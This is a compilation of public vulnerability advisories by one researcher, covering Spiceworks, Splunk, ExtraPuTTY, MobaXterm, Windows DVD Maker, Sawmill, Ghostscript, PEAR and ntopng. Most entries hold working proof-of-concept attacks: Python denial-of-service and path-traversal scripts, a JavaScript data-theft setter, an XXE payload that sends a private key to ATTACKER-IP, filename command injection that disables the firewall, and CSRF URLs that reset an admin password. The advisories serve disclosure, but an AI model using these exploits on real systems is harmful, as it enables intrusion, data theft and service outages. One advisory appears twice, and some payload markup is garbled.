[+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt [+] ISR: APPARITIONSEC Vendor: == www.spiceworks.com Product: = Spiceworks - 7.5 Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices. It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system, a user portal, an integrated knowledge base, and mobile ticket management. Vulnerability Type: == Improper Access Control File Overwrite / Upload CVE Reference: == CVE-2017-7237 Security Issue: The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations" directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed. Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing Spiceworks user. References - released April 3, 2017: https://community.spiceworks.com/support/inventory/docs/network-config#security Proof: === 1) Install Spiceworks 2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig 3) Original someconfig gets overwritten OR Arbitrary file upload c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: March 13, 2017 Sent vendor e.g. POC : March 23, 2017 Request status : March 30, 2017 Vendor reply: "We are still working on this" March 30, 2017 Vendor reply :"Thanks for bringing this to our attention" and releases basic security note of issue on website : April 3, 2017 April 5, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). HYP3RLINX
Splunk Enterprise Information Theft CVE-2017-5607
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt [+] ISR: ApparitionSec Vendor: === www.splunk.com Product: == Splunk Enterprise Splunk provides the leading platform for Operational Intelligence. Customers use Splunk to search, monitor, analyze and visualize machine data. Splunk Enterprise, collects and analyzes high volumes of machine-generated data. Vulnerability Type: == Javascript (JSON) Information Theft CVE Reference: == CVE-2017-5607 Security Issue: Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and if remote user setting is enabled. After, the username can be use to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks. Root cause is the global Window JS variable assignment of config?autoload=1 '$C'. e.g. window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... } To steal information we simply can define a function to be called when the '$C' JS property is "set" on webpage, for example. Object.defineProperty( Object.prototype, "$C", { set:function(val){... The Object prototype is a Object that every other object inherits from in JavaScript, if we create a setter on the name of our target in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace. Affected Splunk Enterprise versions: 6.5.x before 6.5.3 6.4.x before 6.4.6 6.3.x before 6.3.10 6.2.x before 6.2.13.1 6.1.x before 6.1.13 6.0.x before 6.0.14 5.0.x before 5.0.18 and Splunk Light before 6.5.2 Vulnerability could allow a remote attacker to obtain logged-in username and Splunk version-related information via JavaScript. References: = https://www.splunk.com/view/SP-CAAAPZ3 https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607 Exploit/POC: = Reproduction: 1) Log into Splunk 2) place the below Javascript in webpage on another server. "Splunk-Data-Theft.html" Object.defineProperty( Object.prototype, "$C", { set:function(val){ //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password") for(var i in val){ alert(""+i+" "+val[i]); } } }); https://VICTIM-IP:8000/en-US/config?autoload=1"</a>;> 3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current authenticated user 4) Phish or brute force the application. Video POC URL: === https://vimeo.com/210634562 Network Access: === Remote Impact: === Information Disclosure Severity: = Medium Disclosure Timeline: === Vendor Notification: November 30, 2016 Vendor Acknowledgement: December 2, 2016 Vendor Release Splunk 6.5.3 / Patch : March 30, 2017 March 31, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: == www.extraputty.com Product: == ExtraPuTTY - v029_RC2 hash: d7212fb5bc4144ef895618187f532773 Also Vulnerable: v0.30 r15 hash: eac63550f837a98d5d52d0a19d938b91 ExtraPuTTY is a fork from 0.67 version of PuTTY. ExtraPuTTY has all the features from the original soft and adds others. Below a short list of the principal features (see all features): DLL frontend TestStand API ( LabWindows ,TestStand 2012) timestamp StatusBar Scripting a session with lua 5.3. Automatic sequencing of commands. Shortcuts for pre-defined commands. Keyboard shortcuts for pre-defined command Portability (use of directories structure) Integrates FTP,TFTP,SCP,SFTP,Ymodem,Xmodem transfert protocols Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects Change default settings from configuration file Change putty settings during session PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows Vulnerability Type: === TFTP Denial of Service CVE Reference: == CVE-2017-7183 Security Issue: TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP Read/Write TFTP protocol request packets. Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run below Python exploit. Then, BOOM (100c.30c): Access violation - code c005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - eax= ebx=0929ee98 ecx=0174 edx=7efefeff esi=0002 edi= eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246 ntdll!ZwWaitForMultipleObjects+0x15: Exploit/POC: = import socket print "ExtraPuTTY v029_RC2 TFTP Server" print "Remote Denial Of Service 0day Exploit" print "John Page AKA hyp3rlinx\n" TARGET=raw_input("[IP]>") TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>")) CRASH="A"*2000 PORT = 69 if TYPE==1: PAYLOAD = "\x00\x01" PAYLOAD += CRASH + "\x00" PAYLOAD += "netascii\x00" elif TYPE==2: PAYLOAD = "\x00\x02" PAYLOAD += CRASH + "\x00" PAYLOAD += "netascii\x00" try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT)) recv = s.recvfrom(255) if recv != None: print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET) s.sendto(PAYLOAD, (TARGET, PORT)) except Exception: print 'Server not avail, try later' s.close() Network Access: === Remote Severity: = Medium Disclosure Timeline: === Vendor Notification: No reply March 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-6805 MobaXterm Personal Edition v9.4 Path Traversal Remote File Disclosure
+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL -REMOTE-FILE-ACCESS.txt [+] ISR: ApparitionSec Vendor: = mobaxterm.mobatek.net Product: === MobaXterm Personal Edition v9.4 Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more. Vulnerability Type: = Path Traversal Remote File Disclosure CVE Reference: == CVE-2017-6805 Security Issue: Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using directory traversal attacks e.g. ../../../../Windows/system.ini Start MobaXterm TFTP server which listens on default TFTP port 69. c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini Transfer successful: 219 bytes in 1 second(s), 219 bytes/s c:\xampp\htdocs>type system.ini ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Victim Data located on: 127.0.0.1 POC URL: = https://vimeo.com/207516364 Exploit: == import sys,socket print 'MobaXterm TFTP Directory Traversal 0day Exploit' print 'Read Windows/system.ini' print 'hyp3rlinx \n' HOST = raw_input("[IP]>") FILE = 'Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01" #TFTP Read PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: No Reply March 10, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Path Traversal Remote File Disclosure
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt [+] ISR: ApparitionSec Vendor: = mobaxterm.mobatek.net Product: === MobaXterm Personal Edition v9.4 Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more. Vulnerability Type: = Path Traversal Remote File Disclosure CVE Reference: == CVE-2017-6805 Security Issue: Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using directory traversal attacks e.g. ../../../../Windows/system.ini Start MobaXterm TFTP server which listens on default TFTP port 69. c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini Transfer successful: 219 bytes in 1 second(s), 219 bytes/s c:\xampp\htdocs>type system.ini ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Victim Data located on: 127.0.0.1 POC URL: = https://vimeo.com/207516364 Exploit: == import sys,socket print 'MobaXterm TFTP Directory Traversal 0day Exploit' print 'Read Windows/system.ini' print 'hyp3rlinx \n' HOST = raw_input("[IP]>") FILE = 'Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01"#TFTP Read PAYLOAD += "../" * 4 + FILE + "\x00"#Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: No Reply March 10, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2017-0045 Windows DVD Maker XML External Entity File Disclosure
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: = Windows DVD Maker v6.1.7 Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player. Vulnerability Type: = XML External Entity Injection CVE Reference: == CVE-2017-0045 MS17-020 Security issue: Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks allowing remote attackers to gain access to files from a victims computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosures. POC URL: = https://vimeo.com/208383182 References: https://technet.microsoft.com/library/security/MS17-020 https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017 Applies to: Windows Server 2008 R2 Service Pack 1 Windows Server 2008 R2 Datacenter Windows Server 2008 R2 Enterprise Windows Server 2008 R2 Standard Windows Web Server 2008 R2 Windows Server 2008 R2 Foundation Windows 7 Service Pack 1 Windows 7 Ultimate Windows 7 Enterprise Windows 7 Professional Windows 7 Home Premium Windows 7 Home Basic Windows 7 Starter Windows Server 2008 Service Pack 2 Windows Server 2008 Foundation Windows Server 2008 Standard Windows Server 2008 for Itanium-Based Systems Windows Web Server 2008 Windows Server 2008 Enterprise Windows Server 2008 Datacenter Windows Vista Service Pack 2 Windows Vista Home Basic Windows Vista Home Premium Windows Vista Business Windows Vista Ultimate Windows Vista Enterprise Windows Vista Starter Exploit code(s): === Steal XAMPP Web Servers private key "server.key". 1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd) 2) "payload.dtd" http://ATTACKER-IP:8080?%file;'>"> %all; 3) "Evil.msdvd" http://ATTACKER-IP:8080/payload.dtd;> %dtd;]> RESULT: XAMPP Web Server private key sent to attacker: e.g. C:\>python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... 127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-END%20RSA%20PRIVATE%20KEY- HTTP/1.1" 301 - 127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-END%20RSA%20PRIVATE%20KEY-/ HTTP/1.1" 200 - Disclosure Timeline: = Vendor Notification: September 3, 2016 Vendor acknowledgement: November 17, 2016 March 14, 2017 : Vendor released MS17-020 March 15, 2017 : Public Disclosure Network access: = Remote Severity: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due c
Sawmill Enterprise v8.7.9 Pass The Hash Authentication Bypass
[+] Credits: John Page AKA Hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt [+] ISR: ApparitionSec Vendor: === www.sawmill.net Product: Sawmill Enterprise v8.7.9 sawmill8.7.9.4_x86_windows.exe hash: b7ec7bc98c42c4908dfc50450b4521d0 Sawmill is a powerful heirarchical log analysis tool that runs on every major platform. Vulnerability Type: === Pass the Hash Authentication Bypass CVE Reference: == CVE-2017-5496 Security Issue: = Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking account password hashes. This issue usually is known to affect Windows systems e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable Web application. Sawmill account password hashes are stored under LogAnalysisInfo/ directory in "users.cfg". e.g. users = { root_admin = { username = "admin" password_checksum = "e99a18c428cb38d5f260853678922e03" email_address = "" This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmills authenticaton process. Moreover, since 'users.cfg' file is world readble a regular non Admin Windows user who logs into the system running sawmill can now grab a password hash and easily login to the vulnerable application without the needing the password itself. How to test? Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non Administrator user. 1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash. 2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin. Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no salt. e.g. password: abc123 MD5 hash: e99a18c428cb38d5f260853678922e03 Disclosure Timeline: = Vendor Notification: January 7, 2017 CVE-2017-5496 assigned : January 20 Request status : January 26 Vendor: Fix avail later in year still no ETA Inform vendor public disclose date February 18, 2017 : Public Disclosure Network Access: === Remote Impact: == Information Disclosure Privilege Escalation Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Hyp3rlinx
EasyCom SQL iPlug Denial Of Service
[+] Credits: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec Vendor: easycom-aura.com Product: === SQL iPlug EasycomPHP_4.0029.iC8im2.exe SQL iPlug provides System i applications real-time access to heterogeneous and external databases (Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication. Vulnerability Type: === Denial Of Service CVE Reference: == CVE-2017-5359 Security Issue: SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via HTTP requests fed to the "D$EVAL" parameter. Exploit/POC: import socket print 'EasyCom SQL-IPLUG DOS 0day!' print 'hyp3rlinx' IP = raw_input("[IP]> ") PORT = 7078 payload="A"*43000 arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n") c+=1 print "doit!" except socket.error: print "[*] 5th ave 12:00" raw_input() break Disclosure Timeline: == Vendor Notification: December 22, 2016 Vendor acknowledgement: December 23, 2016 Vendor Release Fix/Version February 20, 2017 February 22, 2017 : Public Disclosure Network Access: === Remote Severity: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Ghostscript 9.20 Filename Command Execution
[+]# [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt [+] ISR: ApparitionSec [+] Vendor: === ghostscript.com Product: Ghostscript 9.20 gs920w32.exe Windows (32 bit) hash: fee2cc1b8b467888a4ed44dd9f4567ed Ghostscript is a suite of software based Postscript and PDF interpreter/renderers for file conversion. Vulnerability Type: == Filename Command Execution CVE Reference: == N/A Security Issue: The ghostscript ps2epsi translator to processes ".ps" files executes arbitrary commands from specially crafted filenames that contain OS commands as part of the processed postscript files name. This feature seems to work only using the ps2epsi translator. Other tested GS translator calls like 'ps2pdf' fail. c:\>ps2epsi "Usage: ps2epsi " Example, take a file "POC&;1.ps", it will run arbitrary Commands contained after the ampersand character "&". If a user runs some automated script to call the ps2epsi translator to process ".ps" files from a remote share or directory where actual filename is unknown, it can potentially allow attackers to execute arbitrary commands on victims machine. Characters like "/", ":" are restricted in filenames, but we can abuse Windows netsh and wmic to bypass some of these barriers. Quick Ghostscript CL test. Create file called Test1.ps ps2epsi "Test1.ps" outfile BOOM! calc.exe runs... Exploit/POC: = Add Ghostscript lib 'c:\Program Files (x86)\gs\gs9.20\lib' to Windows environmental Path, so we can easily call 'ps2epsi' GS CMD. Create the following malicious ".ps" postscript files. 1) Turn of Windows Firewall Test Advfirewall set allprofiles state off&;1.ps 2) Enable Windows Administrator account (using WMIC). Test useraccount where name='administrator' set disabled='false'&;1.ps If user don't have wmic on path, fix it for POC by set environmental system variable. Add "C:\Windows\system32\wbem;" to 'Path' variable. Run below bat script to process bunch of *.ps" files. "POC.bat" @echo off rem ghostscript Filename Command Execution POC rem by hyp3rlinx for %%1 in ("*.ps") do; ps2epsi "%%1" "evil.ps" Severity: = Medium Disclosure Timeline: === Vendor Notification: No replies February 2, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
PEAR HTTP_Upload v1.0.0b3 Arbitrary File Upload
[+] [+] Credits: John Page AKA Hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt [+] ISR: ApparitionSEC [+] Vendor: pear.php.net Product: HTTP_Upload v1.0.0b3 Download: https://pear.php.net/manual/en/package.http.http-upload.php Easy and secure managment of files submitted via HTML Forms. pear install HTTP_Upload This class provides an advanced file uploader system for file uploads made from html forms. Features: * Can handle from one file to multiple files. * Safe file copying from tmp dir. * Easy detecting mechanism of valid upload, missing upload or error. * Gives extensive information about the uploaded file. * Rename uploaded files in different ways: as it is, safe or unique * Validate allowed file extensions * Multiple languages error messages support (es, en, de, fr, it, nl, pt_BR) Vulnerability Type: == Arbitrary File Upload CVE Reference: == N/A Vulnerability Details: = The package comes with an "upload_example.php" file to test the package, when uploading a "restricted" PHP file user will get message like "Unauthorized file transmission". Line: 488 of "Upload.php" var $_extensionsCheck = array('php', 'phtm', 'phtml', 'php3', 'inc'); If user does not go thru the "Upload.php" code line by line. They will find option to set case sensitive check. e.g. Line: 503 "$_extensionsCaseSensitive"=true Line: 874 * @param bool $case_sensitive whether extension check is case sensitive. * When it is case insensitive, the extension * is lowercased before compared to the array * of valid extensions. This setting looks to prevent mixed or uppercase extension on disallowed PHP file type bypass before uploading. However, some developers are unaware that "Apache" can process file with extension like PHP.1, PHP.; etc. if the last extension is not specified in the list of mime-types known to the web server. Therefore, attackers can easily bypass the security check by appending ".1" to end of the file, which can result in arbitrary command execution on the affected server. e.g. "ext_bypass.php.1" contents: Sucessfully Tested on: Bitnami wampstack-5.6.29-0. Server version: Apache/2.4.23 (Win64) Sucessfully Tested on: XAMPP for Linux 5.6.8-0 Server version: Apache/2.4.12 (Unix) Disclosure Timeline: == Vendor Notification: December 31, 2016 Similar bug reported and open 2012 Issue Fixed: January 17, 2017 January 25, 2017 : Public Disclosure Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
NTOPNG Web Interface v2.4 CSRF Token Bypass
[+]# [+] Credits / Discovery: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt [+] ISR: ApparitionSEC [+]# Vendor: www.ntop.org Product: ntopng Web Interface v2.4.160627 ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. Vulnerability Type: == CSRF Token Bypass CVE Reference: CVE-2017-5473 Security Issue: = By simply omitting the CSRF token or supplying arbitrary token values will bypass CSRF protection when making HTTP requests, to the ntopng web interface. Allowing remote attackers the rights to make HTTP requests on an authenticated users behalf, if the user clicks an malicious link or visits an attacker webpage etc. Exploit/POC: 1) Change admin password http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED=admin_password=xyz123_new_password=xyz123 2) Add arbitrary http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED; method="GET"> document.forms[0].submit() Disclosure Timeline: = Vendor Notification: January 11, 2017 Vendor acknowledgement: January 12, 2017 Vendor Fixed Issue January 20, 2017 : Public Disclosure Network Access: === Remote Impact: == Information Disclosure Privilege Escalation Severity: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) HYP3RLINX - Apparition Hyp3rlinX
